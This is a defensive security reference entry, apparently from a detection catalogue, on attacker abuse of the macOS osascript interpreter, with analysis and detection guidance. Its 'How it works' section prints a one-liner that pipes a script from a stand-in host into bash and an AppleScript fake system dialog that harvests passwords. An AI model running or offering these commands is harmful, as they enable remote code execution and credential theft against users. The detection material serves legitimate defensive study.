osascript Execution
The built-in AppleScript/JXA interpreter runs system automation, shell commands and fake credential dialogs from a script embedded in a document or email — the macOS analogue of mshta.exe/wscript.exe.
osascript is a command-line interpreter, shipped on every Mac, for
AppleScript and JavaScript for Automation (JXA). Both languages can drive
other applications through Apple Events, prompt the user with native-looking
dialogs, and shell out to arbitrary commands (do shell script in
AppleScript, app.doShellScript in JXA) — giving broad system automation from
a plain-text script with no compiled binary required. Because osascript is
Apple-signed and present by default, it is the macOS equivalent of
mshta.exe/wscript.exe/cscript.exe on Windows: a trusted interpreter that
happily runs whatever text an attacker hands it, whether typed at a terminal,
embedded in a document macro, or attached as a script to a phishing email.
How it works
A one-liner drives another app or the shell directly:
osascript -e 'do shell script "curl -s https://update.example.com/stage2 | bash"'A common social-engineering payload uses AppleScript's native dialog support to imitate a system prompt and harvest the user's password:
display dialog "macOS requires your password to install updates." ¬
default answer "" with hidden answer with icon cautionJXA gives the same capability with JavaScript syntax and easier access to
Cocoa/Foundation APIs, which some payloads prefer for direct file and network
operations without shelling out at all. Distribution is typically a .scpt
compiled script, a plain .js/.applescript file, or the script embedded
inside a document macro or a disk-image "installer" the victim is told to run.
Detection & analysis
Static analysis:
- Extract and read any embedded AppleScript/JXA source from a suspect
document, disk image, or
.scptfile —osadecompilerecovers readable source from a compiled script. Look fordo shell script, network calls, anddisplay dialog/display alertprompts requesting credentials. - A downloaded archive or disk image that bundles a script alongside an "installer" narrative (fake update, fake Flash/plugin installer) is a recurring delivery pattern.
Dynamic analysis:
- Log
osascriptcommand-line invocations and their full argument/script content; an unusual parent process (Mail, a downloaded document viewer, a mounted disk image) spawningosascriptis the primary signal, mirroring howmshta.exe/wscript.exeparentage is treated on Windows. - Watch for
osascriptimmediately followed by a network connection or a shell child process (bash,sh,curl) — the interpreter itself doing the network fetch is a strong indicator versus a legitimate automation script.
Detection rule hint:
Alert on osascript process creation where the parent is a mail client, a
document viewer, or a process running from a mounted disk image/download
folder, especially when the invocation includes -e "do shell script" or the
script argument references a network URL.